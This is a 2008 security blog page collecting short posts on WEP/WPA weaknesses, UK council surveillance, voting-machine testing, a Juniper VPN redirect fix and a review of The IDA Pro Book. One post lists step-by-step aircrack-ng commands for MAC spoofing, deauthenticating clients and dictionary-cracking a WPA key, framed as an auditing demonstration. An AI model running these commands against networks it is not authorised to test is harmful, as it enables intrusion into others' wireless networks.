by prithpal on August 31, 2008
in SBN
It’s been over two years now since presentation and tools related to WEP and WPA keys cracking began to appear all over the internet and print media, tools for auditing wireless networks, tools for security auditing and of course tools for educational purpose only, over a period of time, this tools got updated to better and more features.
Even after frequent reminders about implication of WEP vulnerabilities, many administrators are still implementing WEP or Dictionary based passwords in case of WPA. My recent post about WPA Crack demonstrates the flaw of a weak password in WPA implementation.
The point I am making here is even though manufacturers for various wifi devices are aware of this facts why are they still shipping their products with weak authentication protocols, I am sure it wont take another round of a VC funding for updating firmware. As for today’s scenario all it takes is to make WPA2 the only available authentication available in those devices, with option of numerical and character based password to avoid a dictionary based attacks.
But then if there are no viruses there won’t be any anti virus in market, likewise many alternative devices and solutions have pop up lately for wifi security.
I Guess It should be mandatory for manufactures of wifi devices to comply with a strict policy of updating their products and firmware specially incase of products concern with first line of defense of a network.
You may also like this
by Frederick on August 31, 2008
in SBN
It's a good introduction for a non-specialist. It leaves some things out, and I spotted one really minor error, but it's worth your time.
by prithpal on August 30, 2008
in SBN
This Video demonstrates WPA cracking using dictionary based brute force, all tools used in demonstration are available in Backtrack3.
Backtrack is a security penetration testing live open source Linux distro, Backtrack took two of the best, Whax and Auditor and merged them to make one meaningful distro that emerged as an ethical hackers best choice for security auditing. It comes loaded with tools including network mapping, Info gathering, vulnerability Identification tools, and even some for Bluetooth hacking.
Commands Used in video (Step by Step):
1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger –mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
7)aireplay-ng -0 5 -a (bssid)wlan0
8)aircrack-ng (filename-01.cap)-w (dictionary location)
Click here to view the embedded video.
Backtrack can be downloaded from here
You may also like this
by davehull on August 29, 2008
in SBN
by Frederick on August 29, 2008
in SBN
A three-year-old in Dorset, England, is having trouble sleeping at night. She's afraid there's a man outside watching her.
There's a reason. Government employees were following her family to and from school for three weeks, making records such as "female and three children enter target vehicle and drive off" and "curtains open and all lights on in premises".
But, we are told, we have to trade some privacy for security. Let's take a look at the public safety implications, and see if they justify following kids to school and scaring a three-year-old.
The surveillance was to assess whether the family really lived in the coverage area of the school they applied to. (They did, by the way).
The Poole borough spying case.
Ask tough questions if your government tells you they need to invade your privacy in the name of security.
by Frederick on August 29, 2008
in SBN
by Frederick on August 29, 2008
in SBN
I've written before about the
limitations on the "certification" of voting machines.
There's been more talk about it recently.
Wired magazine's criticism of voting machine testing notes that problems go years without being fixed, and that the testing consists of going down a checklist that often has nothing to do with reliability or security. Worse, the software running in your election may be different from the software that got certified.
University of Iowa computer science professor Douglas Jones proposes testing procedures for voting machines including election-day tests aimed at catching malicious software that gives the right answers until it sees it's in a real election.
Nobody in those discussions mentions a key point. If you could make software reliable by testing it, we'd see a lot fewer bugs in our daily live. Security is even harder to test for than reliability. A program can run just fine and be insecure.
The way to get secure software is to start at the design stage and build it from the ground up to resist or detect attack. For example, the software that adds up the vote totals from the precincts shouldn't allow the machine operator to change the totals without even creating a record of the change. One widely used design did allow that.
The next step in improving software security is to let qualified people, lots of them, look for hidden flaws. That includes cryptographers, but also the kinds of sideways-thinking people who like solving puzzles and doing things that are supposed to be impossible.
by James.Costello on August 29, 2008
in SBN
My company does a lot work with Juniper SSL implemenations.
There has been some odd behavior in Firefox on Windows machines when connecting to Juniper SSL VPN. Immediately after login users are taken to a blank white page. The URL of the page contains data/home/starter0.cgi?check=yes . The page you should be redirected to includes data/home/starter.cgi?check=yes.
Juniper’s suggested work around is to go back to the sign in screen and login again or to remove the 0 from between starter and .cgi. Both are manual solutions, wouldn’t it be easier to have an automatic solution.
Well here it is.
Download the Firefox add on Redirector - https://addons.mozilla.org/en-US/firefox/addon/5064
After installation you will need to restart Firefox
Open Redirector by right clicking on the R in the status bar in Firefox
Click Add…
The Example url is the full url you get stuck on i.e. https://this.ismyexample.com/data/home/starter0.cgi?check=yes
The Include Pattern is https://this.ismyexample.com/data/home/starter0.*
Redirect to is https://this.ismyexample.com/data/home/starter.cgi?check=yes
Set the Pattern Type to Wildcard and click Test pattern
You should get a message that indicates that the pattern matches. If not go back and check your typing.
Click Ok
Click Close
Go back and log in again. You should go right past the page you were getting stuck at previously.
Be safe
James
by Dino Dai Zovi on August 29, 2008
in SBN
Chris Eagle’s long-awaited The IDA Pro Book
has a very straightforward title, but it is perhaps the most descriptive title possible for this book. It is simply the IDA Pro book. The book weighs in at 640 pages and really does an excellent job of covering everything from the basic usage of IDA to using the SDK to extend IDA’s capabilities. While IDA Pro comes with documentation, it is nowhere near as comprehensive or easy to read.
Chris Eagle is clearly an excellent educator, as he makes the sometimes very dense and technically involved material easy to read and understand and also chooses his examples well. One of my personal favorites is an extended example on writing an IDA processor module for Python bytecode. The bytecode’s simple stack language made it easy to focus on the specifics of writing IDA processor modules without getting bogged down in architectural details. The amount of material spent on how to extend IDA is also unique to this book.
This book does not cover the basics of the x86 architecture and x86 assembly, so it is assumed that the reader is already familiar with it. The book also does not spend too much time on showing how to identify high-level language constructs (functions, C++ virtual methods, switch tables, loops, etc) in assembly. After all, this is a book on how to use IDA, not a book on how to read disassembly. For an extensive treatment on how to read disassembly, check out Kris Kaspersky’s Hacker Disassembling Uncovered
or Eldad Eilam’s Reversing: Secrets of Reverse Engineering
.
There are several skill levels of IDA Pro users. The casual (can follow strings or imports references to interesting functions), experienced (can use custom structures to make code easier to read), advanced (can turn assembly into C pseudocode manually), and professional (can write custom IDC scripts and plugins to automate repetitive and/or difficult tasks). This book makes getting to the higher levels much easier and should really be considered an essential purchase along with an IDA license for any serious user.
by Frederick on August 29, 2008
in SBN
